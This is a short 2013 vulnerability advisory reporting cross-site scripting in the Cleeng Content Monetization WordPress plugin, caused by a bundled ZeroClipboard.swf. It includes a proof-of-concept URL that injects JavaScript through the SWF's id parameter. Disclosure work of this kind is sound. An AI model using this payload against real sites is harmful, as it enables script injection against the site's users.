WordPress Plugins - Cleeng Content Monetization (Cleeng) <== XSS
##################################################
# Description : WordPress Plugins - Cleeng Content Monetization (Cleeng) <== XSS
# Version : 2.3.2
# Date : 7/8/2013
# Author : Ryuzaki Lawlet / Fahmi Fisal @Justryuz (ryuzaki_l@y7mail.com)
##################################################
About:
Cleeng is a monetization solution that aims to satisfy the interests of both publishers and users:
1- If you are a musician, blogger, teacher, photographer or software developer, this free plug-in is made for you!
The Cleeng Content Monetization (Cleeng) plugin for WordPress contains cross-site scripting vulnerabilities
which can be exploited by malicious people to conduct cross-site scripting attacks against users of a site running the plugin.
The vulnerabilities are caused by a vulnerable version of ZeroClipboard bundled with the plugin.
The underlying ZeroClipboard issue was disclosed earlier as "Cross-Site Scripting vulnerabilities in ZeroClipboard
and in multiple web applications" (http://seclists.org/fulldisclosure/2013/Feb/103).
Affected products:
All versions are vulnerable (tested on 2.3.2).
Affected vendors:
Cleeng Content Monetization
http://cleeng.com / http://wordpress.org/plugins/cleeng/
Details:
Cross-Site Scripting (WASC-08):
XSS via the id parameter of the bundled ZeroClipboard.swf, and XSS via a payload copied into the clipboard.
PoC:
http://site/wp-content/plugins/cleeng/js/ZeroClipboard.swf?id=\"))}catch(e){}if(!self.a)self.a=!alert(/XSS/)//&width&height
Provided and/or discovered by:
Ryuzaki Lawlet / Fahmi Fisal @justryuz